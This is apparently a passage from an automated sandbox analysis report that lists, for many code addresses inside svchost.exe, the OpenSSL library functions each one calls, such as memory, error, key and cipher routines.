Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA366B040 CRYPTO_free,CRYPTO_strdup,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,42_2_00007FFDA366B040
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3653040 RAND_priv_bytes_ex,CRYPTO_zalloc,EVP_CIPHER_fetch,EVP_CIPHER_CTX_new,EVP_CIPHER_free,OPENSSL_LH_new,OPENSSL_LH_set_thunks,OPENSSL_LH_new,OPENSSL_LH_set_thunks,OPENSSL_LH_free,OPENSSL_LH_doall,OPENSSL_LH_free,EVP_CIPHER_CTX_free,CRYPTO_free,EVP_CIPHER_free,42_2_00007FFDA3653040
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3601030 GetEnvironmentVariableW,GetACP,MultiByteToWideChar,malloc,MultiByteToWideChar,GetEnvironmentVariableW,malloc,GetEnvironmentVariableW,WideCharToMultiByte,CRYPTO_malloc,WideCharToMultiByte,CRYPTO_free,free,free,getenv,42_2_00007FFDA3601030
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA360D010 EVP_PKEY_free,X509_free,EVP_PKEY_free,OSSL_STACK_OF_X509_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,X509_STORE_free,X509_STORE_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,42_2_00007FFDA360D010
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3621000 CRYPTO_malloc,memcpy,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,CRYPTO_realloc,memcpy,ERR_new,ERR_new,ERR_set_debug,ERR_set_error,42_2_00007FFDA3621000
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA364CFF0 CRYPTO_realloc,42_2_00007FFDA364CFF0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA366AFE0 CRYPTO_free,42_2_00007FFDA366AFE0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA362CED0 CRYPTO_free,memset,CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,42_2_00007FFDA362CED0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA365EED0 CRYPTO_malloc,CRYPTO_free,42_2_00007FFDA365EED0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3604E80 CRYPTO_free,42_2_00007FFDA3604E80
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3652F00 OPENSSL_LH_free,OPENSSL_LH_free,EVP_CIPHER_CTX_free,CRYPTO_free,42_2_00007FFDA3652F00
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3620EF0 CRYPTO_malloc,memcpy,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,42_2_00007FFDA3620EF0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA365EDD0 OPENSSL_cleanse,CRYPTO_free,CRYPTO_free,CRYPTO_free,42_2_00007FFDA365EDD0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA361CDC0 CRYPTO_malloc,CRYPTO_clear_free,42_2_00007FFDA361CDC0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA360EDB0 CRYPTO_THREAD_run_once,42_2_00007FFDA360EDB0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3652DB0 OPENSSL_LH_retrieve,CRYPTO_free,OPENSSL_LH_delete,OPENSSL_LH_retrieve,OPENSSL_LH_insert,OPENSSL_LH_error,OPENSSL_LH_delete,CRYPTO_free,42_2_00007FFDA3652DB0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3680D80 CRYPTO_free,CRYPTO_free,CRYPTO_free,42_2_00007FFDA3680D80
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA360ECD0 COMP_get_type,CRYPTO_malloc,COMP_get_name,OPENSSL_sk_push,CRYPTO_free,OPENSSL_sk_sort,42_2_00007FFDA360ECD0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3674CC0 EVP_MD_CTX_new,EVP_PKEY_new_raw_private_key_ex,EVP_DigestSignInit_ex,EVP_DigestSign,EVP_MD_CTX_free,EVP_PKEY_free,CRYPTO_memcmp,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,_time64,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_MD_CTX_free,EVP_PKEY_free,ERR_new,ERR_set_debug,EVP_MD_CTX_free,EVP_PKEY_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,42_2_00007FFDA3674CC0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3624CB0 CRYPTO_zalloc,CRYPTO_new_ex_data,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free_ex_data,OPENSSL_cleanse,OPENSSL_cleanse,X509_free,EVP_PKEY_free,OSSL_STACK_OF_X509_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_clear_free,memcpy,42_2_00007FFDA3624CB0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3668CA0 CRYPTO_zalloc,OSSL_PARAM_get_int,ERR_new,OSSL_PARAM_get_uint,ERR_new,strcmp,OSSL_PARAM_get_uint32,ERR_new,strcmp,OSSL_PARAM_get_int,ERR_new,OSSL_PARAM_get_int,ERR_new,ERR_new,ERR_set_debug,BIO_up_ref,BIO_free,BIO_up_ref,BIO_up_ref,ERR_new,ERR_set_debug,ERR_set_error,EVP_CIPHER_is_a,EVP_CIPHER_is_a,42_2_00007FFDA3668CA0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3602C60 CRYPTO_zalloc,CRYPTO_free,42_2_00007FFDA3602C60
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3608C60 EVP_PKEY_free,EVP_PKEY_free,CRYPTO_free,OPENSSL_sk_pop_free,CRYPTO_free,CRYPTO_clear_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,memset,42_2_00007FFDA3608C60
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA368CC60 BN_bin2bn,ERR_new,ERR_set_debug,BN_ucmp,BN_is_zero,CRYPTO_free,CRYPTO_strdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,42_2_00007FFDA368CC60
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3634D30 SRP_Calc_u_ex,BN_num_bits,CRYPTO_malloc,ERR_new,ERR_set_debug,BN_bn2bin,BN_clear_free,BN_clear_free,42_2_00007FFDA3634D30
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA362CD10 CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_memdup,CRYPTO_free,CRYPTO_free,42_2_00007FFDA362CD10
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA365ED00 OPENSSL_cleanse,CRYPTO_free,CRYPTO_free,42_2_00007FFDA365ED00
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA36013A0 CRYPTO_free,42_2_00007FFDA36013A0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA36793A0 ERR_new,ERR_set_debug,CRYPTO_clear_free,42_2_00007FFDA36793A0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3653380 CRYPTO_free,42_2_00007FFDA3653380
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA367B370 ERR_new,ERR_set_debug,EVP_PKEY_CTX_new_from_pkey,ERR_new,ERR_set_debug,CRYPTO_malloc,RAND_bytes_ex,EVP_MD_CTX_new,OBJ_nid2sn,EVP_get_digestbyname,EVP_DigestInit,EVP_DigestUpdate,EVP_DigestUpdate,EVP_DigestFinal_ex,EVP_MD_CTX_free,EVP_PKEY_CTX_free,ERR_new,ERR_set_debug,EVP_PKEY_CTX_free,CRYPTO_clear_free,EVP_MD_CTX_free,42_2_00007FFDA367B370
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA360D360 CRYPTO_zalloc,CRYPTO_zalloc,CRYPTO_free,42_2_00007FFDA360D360
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3617360 CRYPTO_free_ex_data,CRYPTO_THREAD_lock_free,CRYPTO_free,42_2_00007FFDA3617360
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3685360 ERR_new,i2d_PUBKEY,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_set_debug,CRYPTO_free,42_2_00007FFDA3685360
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA362D440 CRYPTO_free,CRYPTO_zalloc,OBJ_txt2nid,CONF_parse_list,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_malloc,memcpy,CRYPTO_free,CRYPTO_free,42_2_00007FFDA362D440
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3671430 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_strdup,ERR_new,ERR_set_debug,42_2_00007FFDA3671430
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA366B420 CRYPTO_free,42_2_00007FFDA366B420
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA363B2D0 CRYPTO_free,42_2_00007FFDA363B2D0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA36232C0 CRYPTO_THREAD_write_lock,OPENSSL_LH_insert,OPENSSL_LH_retrieve,OPENSSL_LH_retrieve,OPENSSL_LH_delete,CRYPTO_THREAD_unlock,42_2_00007FFDA36232C0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA36892A0 EVP_MD_get_size,ERR_new,ERR_set_debug,RAND_bytes_ex,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,42_2_00007FFDA36892A0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA364F290 CRYPTO_realloc,42_2_00007FFDA364F290
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA362D310 CRYPTO_malloc,CRYPTO_free,CRYPTO_free,CRYPTO_free,42_2_00007FFDA362D310
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA36292F0 CRYPTO_realloc,memcpy,42_2_00007FFDA36292F0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA36551D0 CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_error,BIO_up_ref,ERR_new,ERR_set_debug,ERR_set_error,BIO_free,ERR_new,ERR_set_debug,EVP_CIPHER_is_a,EVP_CIPHER_is_a,EVP_CIPHER_is_a,EVP_MD_up_ref,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,EVP_MD_free,ERR_new,ERR_set_debug,ERR_set_error,BIO_free,CRYPTO_free,42_2_00007FFDA36551D0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3655190 BIO_free,CRYPTO_free,42_2_00007FFDA3655190
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3605240 CRYPTO_zalloc,CRYPTO_free,42_2_00007FFDA3605240
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA360321D X509_VERIFY_PARAM_get0_peername,ASYNC_WAIT_CTX_get_status,BIO_clear_flags,BIO_set_init,CRYPTO_free,CRYPTO_zalloc,BIO_set_init,BIO_set_data,BIO_clear_flags,X509_VERIFY_PARAM_get0_peername,BIO_set_shutdown,BIO_push,BIO_set_next,BIO_up_ref,BIO_set_init,42_2_00007FFDA360321D
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3643220 CRYPTO_zalloc,CRYPTO_free,42_2_00007FFDA3643220
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3621210 BIO_s_file,BIO_new,ERR_new,ERR_set_debug,BIO_ctrl,ERR_new,ERR_set_debug,strncmp,ERR_new,ERR_set_debug,strncmp,CRYPTO_realloc,memcpy,CRYPTO_free,CRYPTO_free,CRYPTO_free,PEM_read_bio,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,BIO_free,42_2_00007FFDA3621210
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3653200 OPENSSL_LH_retrieve,OPENSSL_LH_insert,OPENSSL_LH_delete,CRYPTO_free,42_2_00007FFDA3653200
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA36351E0 BN_dup,BN_dup,BN_dup,BN_dup,BN_dup,BN_dup,BN_dup,BN_dup,CRYPTO_strdup,CRYPTO_strdup,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,42_2_00007FFDA36351E0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA36350D0 CRYPTO_free,CRYPTO_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,42_2_00007FFDA36350D0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA360B0B0 i2d_PUBKEY,ASN1_item_i2d,CRYPTO_free,42_2_00007FFDA360B0B0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3681090 CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,42_2_00007FFDA3681090
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3615070 CRYPTO_THREAD_write_lock,CRYPTO_THREAD_unlock,42_2_00007FFDA3615070
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA362D140 CRYPTO_free,CRYPTO_malloc,42_2_00007FFDA362D140
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA367B140 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_get1_encoded_public_key,ERR_new,ERR_set_debug,EVP_PKEY_free,EVP_PKEY_get_size,ERR_new,ERR_set_debug,memset,ERR_new,ERR_set_debug,CRYPTO_free,EVP_PKEY_free,42_2_00007FFDA367B140
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3619120 memcpy,CRYPTO_THREAD_read_lock,OPENSSL_LH_retrieve,CRYPTO_THREAD_unlock,42_2_00007FFDA3619120
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3651127 CRYPTO_realloc,42_2_00007FFDA3651127
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA363D100 CRYPTO_free,42_2_00007FFDA363D100
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA365F0F0 ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_malloc,CRYPTO_memdup,CRYPTO_free,CRYPTO_free,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,BIO_clear_flags,BIO_set_flags,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,memcpy,42_2_00007FFDA365F0F0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA36710E0 CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,42_2_00007FFDA36710E0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3615780 a2i_IPADDRESS,ASN1_OCTET_STRING_free,X509_VERIFY_PARAM_get1_ip_asc,CRYPTO_free,X509_VERIFY_PARAM_add1_host,42_2_00007FFDA3615780
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3675760 CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,42_2_00007FFDA3675760
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3609850 ERR_new,ERR_set_debug,CRYPTO_malloc,ERR_new,ERR_set_debug,EVP_PKEY_decapsulate,ERR_new,ERR_new,ERR_set_debug,CRYPTO_clear_free,EVP_PKEY_CTX_free,42_2_00007FFDA3609850
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3623840 OPENSSL_cleanse,OPENSSL_cleanse,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,42_2_00007FFDA3623840
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3615840 i2d_PUBKEY,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_zalloc,CRYPTO_malloc,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,memcpy,d2i_PUBKEY,EVP_PKEY_free,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_insert,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,EVP_PKEY_free,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,42_2_00007FFDA3615840
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3613820 ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_realloc,CRYPTO_realloc,42_2_00007FFDA3613820
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA36356D0 CRYPTO_zalloc,42_2_00007FFDA36356D0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA36676D0 CRYPTO_free,42_2_00007FFDA36676D0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA36536D0 CRYPTO_clear_free,CRYPTO_free,CRYPTO_free,42_2_00007FFDA36536D0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA36036C0 X509_VERIFY_PARAM_get0_peername,BIO_get_shutdown,ASYNC_WAIT_CTX_get_status,BIO_clear_flags,BIO_set_init,CRYPTO_free,42_2_00007FFDA36036C0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA36716B0 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,42_2_00007FFDA36716B0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA361D68B X509_VERIFY_PARAM_free,BIO_pop,BIO_free,BUF_MEM_free,OPENSSL_sk_free,OPENSSL_sk_free,OPENSSL_sk_free,OPENSSL_sk_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,OPENSSL_sk_pop_free,OPENSSL_sk_pop_free,SCT_LIST_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,EVP_MD_CTX_free,OPENSSL_sk_pop_free,OPENSSL_sk_pop_free,CRYPTO_free,CRYPTO_free,OSSL_STACK_OF_X509_free,ASYNC_WAIT_CTX_free,CRYPTO_free,OPENSSL_sk_free,BIO_free_all,BIO_free_all,CRYPTO_free,42_2_00007FFDA361D68B
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3601740 CRYPTO_zalloc,CRYPTO_free,42_2_00007FFDA3601740
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3669730 CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,CRYPTO_free,42_2_00007FFDA3669730
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3613700 CRYPTO_zalloc,CRYPTO_zalloc,OBJ_nid2sn,EVP_get_digestbyname,OBJ_nid2sn,EVP_get_digestbyname,CRYPTO_free,CRYPTO_free,42_2_00007FFDA3613700
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA367B6E0 EVP_MD_CTX_new,EVP_DigestInit,EVP_DigestUpdate,EVP_DigestUpdate,EVP_DigestFinal_ex,EVP_MD_CTX_free,CRYPTO_malloc,RAND_bytes_ex,EVP_PKEY_CTX_new_from_pkey,EVP_PKEY_encrypt_init,EVP_PKEY_CTX_ctrl,EVP_PKEY_CTX_ctrl,EVP_PKEY_encrypt,EVP_PKEY_encrypt,EVP_PKEY_CTX_free,EVP_MD_CTX_free,ERR_new,ERR_set_debug,EVP_PKEY_CTX_free,CRYPTO_clear_free,ERR_new,ERR_set_debug,42_2_00007FFDA367B6E0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA36035C8 CRYPTO_zalloc,BIO_set_init,BIO_set_data,BIO_clear_flags,42_2_00007FFDA36035C8
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA36575D0 CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,42_2_00007FFDA36575D0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA36015D0 CRYPTO_free,42_2_00007FFDA36015D0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA36275B0 ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_malloc,memcpy,memcpy,memcmp,memcmp,memcmp,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_clear_free,42_2_00007FFDA36275B0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA36695A0 CRYPTO_free,42_2_00007FFDA36695A0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3609590 CRYPTO_free,CRYPTO_memdup,42_2_00007FFDA3609590
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA366B590 CRYPTO_free,42_2_00007FFDA366B590
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3623650 CRYPTO_THREAD_unlock,42_2_00007FFDA3623650
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3681650 CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,memcpy,CRYPTO_free,CRYPTO_free,CRYPTO_free,42_2_00007FFDA3681650
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3669620 CRYPTO_malloc,ERR_new,ERR_set_debug,42_2_00007FFDA3669620
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA363B5F0 CRYPTO_free,42_2_00007FFDA363B5F0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA366D5F0 ERR_new,ERR_set_debug,memset,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,OPENSSL_cleanse,CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_new,ERR_set_debug,OPENSSL_cleanse,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,CRYPTO_memcmp,ERR_new,ERR_new,42_2_00007FFDA366D5F0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA366B5E0 CRYPTO_free,42_2_00007FFDA366B5E0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA363B4B0 CRYPTO_zalloc,42_2_00007FFDA363B4B0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA366B4A0 CRYPTO_free,CRYPTO_free,42_2_00007FFDA366B4A0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3625550 CRYPTO_malloc,CRYPTO_new_ex_data,ERR_new,ERR_set_debug,ERR_set_error,X509_up_ref,ERR_new,ERR_set_debug,ERR_set_error,X509_chain_up_ref,ERR_new,ERR_set_debug,ERR_set_error,EVP_PKEY_up_ref,CRYPTO_strdup,CRYPTO_strdup,CRYPTO_dup_ex_data,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_strdup,CRYPTO_memdup,CRYPTO_memdup,CRYPTO_strdup,CRYPTO_memdup,42_2_00007FFDA3625550
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA368B550 CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,memcmp,ERR_new,ERR_set_debug,CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,42_2_00007FFDA368B550
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3669540 OPENSSL_cleanse,CRYPTO_free,42_2_00007FFDA3669540
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA360B500 CRYPTO_free,42_2_00007FFDA360B500
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3615500 ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_strdup,42_2_00007FFDA3615500
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA36234E0 CRYPTO_THREAD_write_lock,OPENSSL_LH_delete,OPENSSL_sk_push,OPENSSL_LH_set_down_load,CRYPTO_THREAD_unlock,OPENSSL_sk_pop_free,42_2_00007FFDA36234E0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA366D4E0 ERR_new,ERR_set_debug,CRYPTO_free,42_2_00007FFDA366D4E0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA36774E0 CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,42_2_00007FFDA36774E0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3609C50 ERR_new,ERR_set_debug,EVP_PKEY_CTX_new_from_pkey,CRYPTO_malloc,CRYPTO_malloc,EVP_PKEY_encapsulate,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_clear_free,CRYPTO_free,EVP_PKEY_CTX_free,42_2_00007FFDA3609C50
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3603C40 ERR_clear_error,ERR_new,ERR_set_debug,CRYPTO_malloc,CRYPTO_malloc,CRYPTO_free,SetLastError,BIO_read,BIO_ADDR_new,BIO_ctrl,BIO_ctrl,BIO_ADDR_free,BIO_write,BIO_ctrl,BIO_test_flags,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,BIO_ctrl,BIO_ADDR_clear,BIO_write,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,BIO_test_flags,BIO_ADDR_free,CRYPTO_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,42_2_00007FFDA3603C40
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3689C40 EVP_MD_CTX_new,ERR_new,ERR_set_debug,EVP_PKEY_free,CRYPTO_free,EVP_MD_CTX_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_get_security_bits,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_free,EVP_PKEY_get_bn_param,EVP_PKEY_get_bn_param,ERR_new,ERR_set_debug,EVP_PKEY_free,CRYPTO_free,EVP_MD_CTX_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_get1_encoded_public_key,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_free,CRYPTO_free,EVP_MD_CTX_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,BN_num_bits,BN_num_bits,memset,BN_num_bits,BN_bn2bin,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_MD_get0_name,EVP_DigestSignInit_ex,ERR_new,ERR_set_debug,EVP_PKEY_CTX_set_rsa_padding,EVP_PKEY_CTX_set_rsa_pss_saltlen,ERR_new,ERR_set_debug,EVP_DigestSign,EVP_DigestSign,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,EVP_MD_CTX_free,BN_free,BN_free,BN_free,BN_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,42_2_00007FFDA3689C40
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3601C50 CRYPTO_zalloc,42_2_00007FFDA3601C50
